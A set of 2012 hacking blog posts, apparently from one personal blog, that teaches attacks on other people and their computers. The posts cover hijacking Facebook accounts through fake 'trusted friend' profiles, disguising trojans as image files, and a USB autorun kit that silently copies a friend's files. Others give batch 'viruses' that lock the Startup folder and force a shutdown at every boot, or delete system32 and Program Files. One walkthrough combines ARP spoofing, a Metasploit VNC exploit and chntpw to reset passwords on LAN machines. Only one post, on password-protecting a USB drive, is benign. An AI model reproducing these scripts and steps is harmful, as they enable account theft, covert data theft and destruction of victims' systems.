Monday, 21 May 2012

Hack fb account 100% working[[OUTDATED]]!!! without any softwares...




icon wink Hack Any Facebook Account Using 3 Fake Profiles Trick
Disclaimer: This article is for educational purpose. It is to educate you about how your profile can be hacked by others, but not to encourage readers into hacking others accounts.


icon wink Hack Any Facebook Account Using 3 Fake Profiles Trick
icon wink Hack Any Facebook Account Using 3 Fake Profiles Trickicon wink Hack Any Facebook Account Using 3 Fake Profiles Trick
Please don’t believe any site or software which claims to help you hack facebook profiles, you’ll end up installing dangerous virus on your computer or being your own account hacked. Today i am going to teach you, how to hack facebook profile without using traditional Phishing, Keylogging and other Social Techniques. In this hack i’ll be using facebook’s own Trusted Friends Password Recovery method.
icon wink Hack Any Facebook Account Using 3 Fake Profiles Trick

 HATE TO BREAK THIS TO YOU ENTHUSIASTS,BUT THIS TRICK IS OUTDATED,FB NOW USES THE OLD FASHIONED "ENTER YOUR EMAIL ID" METHOD.....THIS METHOD NO LONGER EXISTS...THIS ARTICLE SIMPLY SERVES AS A TIMEPASS NOW..... :)



Requirements:

1> 3 Fake Profiles.
2> Firefox and Chrome.
3> Patience and little Luck.

-> Create three fake profiles by your yourself. You have to send add requests from these profiles to the victim. Before sending these customize these profiles in such a way that the victim adds these profiles without any suspicion  Make sure one of this profiles goes to same school as victim, one has same workplace and last one has same surname, Trust me you’ll thank me later. One last thing. One last thing these accounts should be older than 7 days. After the victim has accepted the friend requests, interact a little with victim using these profiles(like add a comment,tag a photo etc). If you’re done, trap has been set for victim.

Steps:
 Just to make sure this thing really works i’ve tested this to hack my own profile and couple other business profiles of mine today(christmas.2011) and it works.

icon wink Hack Any Facebook Account Using 3 Fake Profiles Trick
1> Open Chrome and Go to www.facebook.com and click on ‘Forgot your Password?’ link. If you know the victims username or email (you can get this from victims profile info) enter them, other wise go down and enter victims name & your fake profile name.

2> Click on ‘No Longer Access to These’. Facebook will say you to enter new email account that you have now full access to send you the recovery details(I suggest you to enter a Fake or Temporary email address for safety purpose).

 6570143549 ec4f4a50d1 Hack Any Facebook Account Using 3 Fake Profiles Trick

icon wink Hack Any Facebook Account Using 3 Fake Profiles Trick
Unless you’re trying these steps for first time, chances are that facebook will not ask you to provide new email account. Instead it will give you some info about how to regain access to old email account. This is where the Patience and luck plays its part, facebooks checks if your attempting to hack others accounts and writes corresponding cookies, if you’re one of them. Clear your chrome cookies/cache and reset your internet connection/change your ip then restart your browser and keep trying. Thats what i did untill i reached step 3

3> Now Facebook will ask you to answer the Security question, well if you have some guesses about that one then check your luck, If you’re lucky enough and took the right guess you’ll get window where you can reset victims password. But if you don’t know it, then don’t worry annd simply enter 3-4 reasonable wrong answers and it will take you to step 4.



Again, Facebook is not made by bunch of fools .It checks if your attempting to hack others accounts and writes corresponding cookies, if it you’re one of them, you’ll be told to enter a email id victims profile name. If this happens Clear your chrome cookies/cache and reset your internet connection/change your ip then restart your browser and keep trying. Thats what i did untill i reached step 4


4> Now Facebook will ask you to select three friends from a selective list of trusted friends. Remember when i told you to customize your profiles with same school, workplace and stuff? those setting will land your fake profiles in this trusted lists. If it doesn’t just go through the requirements section again. Then select your three fake profiles from the list and hit continue.

6570144539 c88df69e5f Hack Any Facebook Account Using 3 Fake Profiles Trick

5> Click ‘send security codes’ in new page. Now open Firefox and login into fake accounts copy the security codes and past them in corresponding fields. Facebook will now send you Resetting email from Facebook on the account you entered in Step 2.
This is how a facebook profile can be hacked.

6570190195 ae403bcfb0 Hack Any Facebook Account Using 3 Fake Profiles Trick
Protect Your Account:
 About 60,000 account have been hacked since facebook has introduced this new concept of trusted friends. To protect your account from these kind of attacks, don’t add strangers and hide your email id by changing privacy settings.
Have Fun!! Happy Facebooking!!
DONT MISS!!!!!

Monday, 7 May 2012

How to run an exe file when an image file is clicked.

Its a simple technique which can come handy when you want to deliver a exe file, especially a trojan or a keylogger, to victim.

Before we start you should better change some of the settings in your PC like "showing hidden files and folder" and "showing the file extension" to edit such settings open "My Computer->Tools(menu bar)->Folder Options->View" and change the settings there, you will be knowing shortly why I am forcing you to do this changes.



1.First thing you need to do is , put your exe file and image file inside same folder.
2.Now go to the properties of image file and you will see a "Change" button click on that and than browse for your exe file which is in the same folder and select it and click "ok".
3.Now whenever the image file will be clicked the exe file will run. But the exe file can be seen and still it can be suspicious for the victim, so better we hide the exe file, to do that open the properties of exe file and check on "Hidden" check box.
4. So the only question left is how do we deliver it? and one more thing we must keep in our mind that the two files must be together, that is in same folder, to do so best thing we can do is archive or zip those files together. 
Note:- Change the icon of the exe file using any icon changer tool. And when you deliver the archived or zipped file, don't just give one or two images archive some 10 to 20 images, which will be enough to confuse the victim.

Sunday, 6 May 2012

Expose Email & Friends Of Any User On Facebook

hi folk's here you can going to learn that how you can easily expose email and friends of any user on facebook. All you need is to join one app on facebook and to send another app to the user and it's done. Watch the video tutorial if you still have questions after watching the tutorial then comment below otherwise just start exposing your victims on facebook





TUTORIAL BY ROOMI COOL

Saturday, 5 May 2012

Trace any Mobile Number In India.




Hello,
           Now I am Posting on "Trace any Mobile Number in India"

To Do this,Just Follow the Below Steps.

First Go To Anyone of These Sites

1.Trace Mobile Number In India

2.Trace Mobile Location and Service Details (Only for India) | www.BharatiyaMobile.com

3.Trace Mobile Number In India www.indiatrace.com

In the First Site,Enter Your  Digit Mobile Number You want to trace and Hit ENTER aur Click on TRACE Button.




In the Second Site,
Enter the 10 Digit Number You want to trace and Hit Enter aur Click On TRACE Button.


In the third site
Enter the 10 Digit Number You want to trace and Hit Enter aur Click On Submit Button.




What Info Does the Site Provides Us about the Phone Number?


The Above Sites Will Provide you with the Following Information

1. Operator Name (For Example- Vodafone,Idea,Airtel,etc)

2.Signalling (i.e-It is either GSM or CDMA)
  
And that's all you have publicly available.......still better than nothing

Data Dump Using your USB Flash Drive





Hi folks…


In this article I am going to teach you something nasty but only for educational purposes.What you do with this is strictly up to you. This only demonstrates how you can copy files from your friend’s PC as soon as you plug in your flash drive or any removable storage media Let’s say you and your friend are preparing for an all important exam that is going to decide the course the rest of your life takes. Your friend has some important notes on his computer that he isn’t going to share with you. Your friend is a moron. You need the notes so badly that you are willing to steal from him.

He deserves it anyway.To get the notes you can either break into his house at night, an accomplice keeps you hanging by a rope from the roof while you deliberately copy the files to your flash drive taking care not to let your feet touch the floor. Or you can walk into his room one morning and say with a feigned smile, “Hey, buddy! I have some great new music. Want it?”. Then plug your USB Flash drive into his PC to automatically copy his notes to your pen drive, secretly and silently. Copy the songs you brought to his PC to complete the act.Sneaky, isn’t it? So let us prepare such a sinister USB Flash drive.



STEP 1


Open Notepad (I recommend Notepad++) and copy-paste the following lines.


[autorun]
icon=drive.ico
open=launch.bat
action=Click OK to Run
shell\open\command=launch.bat


Save this as autorun.inf


The icon line is optional. You can change the icon to your tastes or leave it to the default icon. It’s useful for social engineering purposes like enticing the user to click a file on the drive by making it looks like a game or something.


The “action=” command is optional too but sometimes when the autorun launches it may ask the user what to open. Depending on what you put here the user will be instructed to click Ok or run the file. This code acts as a backup just in case the user is asked what to open. This is not required if you are operating the computer.


The “shell/open command” also acts as a backup in case the user clicks cancel instead of open when prompted. This code will execute when the drive letter is clicked on.


STEP 2


Open Notepad again and copy-paste the following lines


@echo off
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% “%USERPROFILE%\pictures” “%drive%\all\My pics”
%backupcmd% “%USERPROFILE%\Favorites” “%drive%\all\Favorites”
%backupcmd% “%USERPROFILE%\videos” “%drive%\all\vids”
@echo off
cls


Save this as file.bat


This file is configured to copy the contents of the current users pictures, favorites, and videos folder to the Flash drive under a folder called “all”. This is the section of the code you will need to edit depending on what you want to copy.


The first file path “%USERPROFILE%\pictures” – is the target.
The second file path “%drive%\all\My pics” – is the destination.


STEP 3


Open Notepad once again and copy-paste the following line.


CreateObject(“Wscript.Shell”).Run “”"” & WScript.Arguments(0) & “”"”, 0, False


Save this as invisible.vbs

This code runs the file.bat as a process so it does not show the CMD prompt and everything the batch file is processing.


STEP 4


Open Notepad one last time and copy-paste the following line.


wscript.exe \invisible.vbs file.bat


Save this as launch.bat


This batch file does two things, it looks for the invisible.vbs file in the root of the Flash drive then loads it with file.bat so file.bat is run with code from vbs file.

STEP 5


Copy all 4 files created in the above steps and put it on the root of the Flash drive, including the icon file if needed. Also create a folder named “all” where the contents are to be copied automatically. You can call this folder by any name, but then you need to reflect the changes you made in step 2.


This is all that needs to be done. Test the Flash drive on your own computer first before playing it out on your victim. It works flawlessly.

How To Password Protect Your USB Flash Drive


Hello Friends, Today we'll discuss about "Password Protect Your USB Flash Drive"

You will get the Download link for Rohos Mini Drive at the end of this post.

USB drives are simple to carry, but easy to misplace and that can be risky with sensitive information. Rohos Mini Drive is a freeware app that safeguards personal documents by creating a password-protected partition on your flash drive. The download actually installs two programs. One, Rohos Mini Drive, is the partition manager that self-installs as a portable app on the drive when you create the partition. The second, Rohos Disk Browser, is a portable file manager, which can be useful when the encrypted partition can't be read by the host computer.

Operating Rohos Mini Drive is fairly straightforward. Plug in your portable drive and start the program. You should see three choices: Set up USB flash drive, Change password, and Options. Setting up the drive requires choosing a password--that's it. Depending on the size of the drive, creating the partition should happen reasonably quickly. Once the partition has been created, you can change the disk size and partition drive letter. The Rohos Disk Browser displays and manipulate items in the protected partition. Single-click functions include open, saving, deleting, and displaying file properties. Searching and opening the partition is also easily selected from a short pull-down menu.

Rohos Mini Drive includes features to open the protected drive on systems where the user doesn't have administrator rights. That makes this app easy to use anywhere from public library labs to your best friend's system. We can easily recommend this app for all experienced users needing to transport personal files.


Download Link For ROHOS MINI DRIVE- Click To Download

Thursday, 3 May 2012

Classic prank on Facebook [[OUTDATED!!]]

Being on my devilish side, I really scare the hell out of people. They think that i'm a sweet guy, but it's seriously not the case. Early this morning I pranked my friend, he was damn scared. Here is what I did.

I gave him a link to a flash page (a page which uses flash player) which looks exactly like someone's facebook profile. This flash page contains the old facebook page,too bad there's no such thing for the timeline,but still works on unsuspecting people :). Just give them the link and tell them to have a look at her profile. As the male hormones will get exited and female curiosity will increase, any gender will explore the profile. After a short notification stating that "This user profile is not suitable for faint of heart." Something like the picture will show up. If you are not sure about the reaction. Click on the link and read the rest of the article, after finishing it, view the profile. Everytime you watch it, everytime you get scared, that's for sure. It also creates a creepy sound, so be sure to switch on the speakers. 

 Note:This was a really fun link but for some reason,is no more

Wednesday, 2 May 2012

Code that Shutdowns the PC every time PC Turns On


This code will shutdown the PC as soon as PC is on. That means the victim can never open his/her PC. To create this virus we will use the shutdown command. Before we start lets see how to use this command:
Command: shutdown
Options: -a, -r, -f, -t, -s, -c. 
-a: abort shutdown
-r: restart
-f: force the running application without warning i.e. force shutdown without warning.
-t: set timeout for shutdown in seconds
-s: shutdown
-c: display shutdown message.
For more options type shutdown /? in command prompt.


Creating Process:-
1. Open Notepad and write the Program as given in the below examples and save it with .bat extension.
2. Convert this bat file to exe file using "bat to exe" converter. Click Here to download the tool.
3. Once converted, Click Here to see a trick to indirectly trigger the file. Or you can upload this file in any file sharing website and give the link to your victim.

Note:- To create batch files follow the above "creating process".

Lets see few examples:-
Lets say this file is shut.exe(convert from bat to exe)

cacls "%allusersprofile%\start menu\programs\startup" /e /p Everyone:N
shutdown -s -f -c "format your hard drive" -t 00
move /y "shut.exe" "%allusersprofile%\start menu\programs\startup\"
Note:- The specified comment may not be seen if the timeout is 00 seconds
This is the most dangerous virus, once this virus is clicked there is no way victim can get away. Lets see what this virus is doing. We have moved our virus to the "startup" folder using move command, so that every time system turns on our virus gets executed and we denied all permissions to "startup" folder using cacls command, so that no one can delete our virus from "startup". In this program we have used four options s, f, c and t, I don't think there is any explanation needed for first three, In the fourth option I have given parameter "00" which means it will shutdown after zero seconds(instantly).

Use below code for Restart:

cacls "%allusersprofile%\start menu\programs\startup" /e /p Everyone:N
shutdown -r -f -c "format your hard drive" -t 00
move /y "shut.exe" "%allusersprofile%\start menu\programs\startup\"

I don't think there is any explanation needed for this program it is exactly same as above, the only thing changed is in place of "-s"(shutdown) option I have used "-r" option.


Precaution:
Do not practice these tricks in your PC, use virtual machine in your PC to make and run these virus. One such virtual machine software is VirtualBox.  Click Here to download.
After installing this Virtual Box install XP or 7 inside it(installing procedure is same). 

If this doesnt work  or you have any questions,please enter them in the comments section.And those who don't know about these virtual machines, I'm working on an article.
Also readying an article abt
 hiding stuff in an image.


Never "test" this on a PC....Use VMs,stay safe!

More Commands which can come handy in creating command line trix!


There are few more commands which can come handy while creating a your own piece of code.But know that if you plan to make a virus with this without a good knowledge of what you're doing,Antiviruses will catch your code red handed. Example- rd this command can be used to remove the directory, if we use this command smartly, we can create a deadly virus. Consider a situation where you created a virus which can delete system32 or program files.

Creating Process:-
1. Open Notepad and write the Program as given in the below examples and save it with .bat extension.
2. Convert this bat file to exe file using "bat to exe" converter. Click Here to download the tool.
3. Send this file to your victim and make him click, you can cover this file using image file, Click Here to learn hiding trick. Or you can upload this file in any file sharing website  and give the link to your victim.

Lets Check some examples:-
Note:- To create batch files follow the above "creating process".


Syntax:
>rd /s /q <path of the foldername>
/s: delete the sub folder and files
/q: quite mode
Example: 
>rd /s /q "C:\Program Files"
>rd /s /s "C:\WINDOWS\system32"

These programs will delete the contents inside program files and system32folder.
Some other useful command:-
taskill
msg

Example you can use "msg" command to annoy the victim:
Copy the below code in .bat file and convert it to .exe extension(read above creating process)
cacls "%allusersprofile%\start menu\programs\startup" /e /p Everyone:N
:a
msg * your arse is kicked
goto a

After converting it to exe move this virus to "startup" folder so that, as soon as system system turns on this virus will run, Read this post to copy the virus in startup folder. And check the first line of this virus it says no one can alter the contents of this virus.
This virus can be used to annoy victim. The best thing about this virus is, it will display the message above all applications and that to in the center:)

Precaution:
Do not practice these tricks in your PC, use virtual machine in your PC to make and run these virus. One such virtual machine is VirtualBox. Click Here to download.
After installing this Virtual Box install XP or 7 inside it(installing procedure is same). 

Tuesday, 1 May 2012

BACKTRACK TRIX: RESET WINDOWS PASSWORD OF ANY REMOTE PC | COMPUTER CONNECTED IN LAN

Hi friends As i have been messing with Back Track OS since past two days and i have decided to post some Tutorial on hacking with Back Track .so here is a small trick on Back Track that allows you to hack any pc connected in lan and allow you to change password of remote PC.



Tips:
If you want to be a backtracker create a live Bootable backtrack in your USB and use it more & more as you can.



Here we go the details :


At firstDisable internet connection of remote system

1. Arpspoof –i eth0 –t 192.168.1.1 192.168.1.2
2. Ctrl+2 to stop.

ThenMetasploit VNC

1. Nmap-> nmap 192.168.1.1
2. Backtrack -> penetration ->framework2 ->msfweb
3. Then copy [127.0.0.1:5555]
4. Open internet and paste it in url and then exploit vnc

Now Reset password on Win XP and Vista(old trick but still gold)

Start->Backtrack -> priviledge escalation ->password attacks-> chntpw

Chntpw: -i /mnt/hda1/windows/system32/config/SAM

1 (Enter)
Username (Enter)
1 (Enter)
Username (Enter)
4 (Enter)
1 (Enter)
Q (Enter)
Y (Enter)

Done :)

A note to the novice:- In case all you need is to get some files in the computer,then  there's an easier method.Just boot via any live CD....This way the computer starts using the OS in the CD and the password protected OS is bypassed.Comment if you need info on this method.

I'll come up with a proper intro to backtrack in later articles